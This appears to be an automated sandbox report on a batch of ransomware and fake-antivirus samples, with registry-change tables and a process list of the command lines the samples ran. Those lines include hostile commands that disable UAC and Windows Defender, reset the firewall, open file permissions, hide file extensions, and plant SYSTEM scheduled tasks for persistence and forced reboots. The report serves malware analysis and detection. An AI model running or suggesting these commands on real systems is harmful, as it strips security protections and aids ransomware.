| Key deleted | \REGISTRY\MACHINE\SOFTWARE\CLASSES\REGFILE\SHELL\OPEN\COMMAND | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs net.exe
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Uninstall | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives = "1044" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoToolbarCustomize = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuMFUprogramsList = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMMyDocs = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSaveSettings = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Uninstall\NoAddRemovePrograms = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoUserNameInStartMenu = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetHood = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{20D04FE0-3AEA-1069-A2D8-08002B30309D} = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\NoDispCPL = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMMyPictures = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFavoritesMenu = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{450D8FBA-AD25-11D0-98A8-0800361B1103} = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuPinnedList = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuSubFolders = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuMyMusic = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoManageMyComputerVerb = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPrinterTabs = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPrinters = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoThemesTab = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMHelp = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoActiveDesktop = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe
"C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe"
C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe
"C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4688 -ip 4688
C:\Users\Admin\AppData\Local\6AdwCleaner.exe
"C:\Users\Admin\AppData\Local\6AdwCleaner.exe"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4688 -s 584
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\MooskccM\OgMMAEUs.exe
"C:\Users\Admin\MooskccM\OgMMAEUs.exe"
C:\ProgramData\vyQwMwog\xsskQcks.exe
"C:\ProgramData\vyQwMwog\xsskQcks.exe"
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Program Files (x86)\antiviruspc2009\avpc2009.exe
"C:\Program Files (x86)\antiviruspc2009\avpc2009.exe"
C:\Windows\SysWOW64\cmd.exe
/c schtasks /Delete /F /TN rhaegal
C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe
"C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qkQQkAAs.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4168 -ip 4168
C:\Users\Admin\AppData\Local\Temp\[email protected]
C:\Users\Admin\AppData\Local\Temp\[email protected]
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4168 -s 480
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\SysWOW64\cmd.exe
/c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1961501349 && exit"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\is-M3M1Q.tmp\is-9U52M.tmp
"C:\Users\Admin\AppData\Local\Temp\is-M3M1Q.tmp\is-9U52M.tmp" /SL4 $10398 "C:\Users\Admin\AppData\Local\Temp\[email protected]" 779923 55808
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
C:\Users\Admin\AppData\Local\Temp\Fantom.exe
"C:\Users\Admin\AppData\Local\Temp\Fantom.exe"
C:\Windows\SysWOW64\cmd.exe
/c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 14:57:00
C:\Windows\SysWOW64\attrib.exe
attrib +h .
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Users\Admin\AppData\Local\Temp\winsp2up.exe
"C:\Users\Admin\AppData\Local\Temp\winsp2up.exe"
C:\Windows\SysWOW64\netsh.exe
C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
C:\Users\Admin\AppData\Roaming\bovdgt.exe
C:\Users\Admin\AppData\Roaming\bovdgt.exe
C:\Windows\SysWOW64\sc.exe
sc config WinDefend start= disabled
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3428 -s 448
C:\Windows\SysWOW64\sc.exe
sc stop WinDefend
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\[email protected]
C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom
C:\Windows\SysWOW64\icacls.exe
icacls . /grant Everyone:F /T /C /Q
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ewIMoUcM.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
C:\Program Files (x86)\Security Central\Security Central.exe
"C:\Program Files (x86)\Security Central\Security Central.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\EN2B55~1.EXE" >> NUL
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kmEAQMgw.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Program Files (x86)\VAV\vav.exe
"C:\Program Files (x86)\VAV\vav.exe"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\RarSFX0\PCDefenderSilentSetup.msi"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom"
C:\Windows\SysWOW64\sc.exe
sc config WinDefend start= disabled
C:\Windows\SysWOW64\netsh.exe
C:\Windows\system32\netsh.exe advfirewall reset
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\ProgramData\4749af15-06d5-4275-a22d-e0727245fc3f_31.avi", start
C:\Windows\SysWOW64\sc.exe
sc stop WinDefend
C:\WINDOWS\302746537.exe
"C:\WINDOWS\302746537.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /Delete /F /TN rhaegal
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5464 -ip 5464
C:\Users\Admin\AppData\Local\Temp\[email protected]
C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom
C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
C:\Windows\9191.tmp
"C:\Windows\9191.tmp" \\.\pipe\{E17B18FF-AF97-4E7A-AE1A-A093BD92BC40}
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3428 -ip 3428
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Program Files (x86)\Security Central\Security Central.exe
"C:\Program Files (x86)\Security Central\Security Central.exe"
C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe
"C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AA98.tmp\302746537.bat" "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1961501349 && exit"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5464 -s 572
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 97761664462357.bat
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 14:57:00
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Windows\Error file remover 1.0.0.0\install\0A01606\Error file remover.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\[email protected] SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /exelang 0 /noprereqs "
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\wrkB873.tmp", start worker
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vsQAAUoU.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\csgMgIsk.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\240628765.exe
"C:\Users\Admin\AppData\Local\Temp\240628765.exe"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\@[email protected]
"C:\Users\Admin\AppData\Local\Temp\@[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 6408 -ip 6408
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6408 -s 564
C:\Users\Admin\AppData\Local\Temp\[email protected]
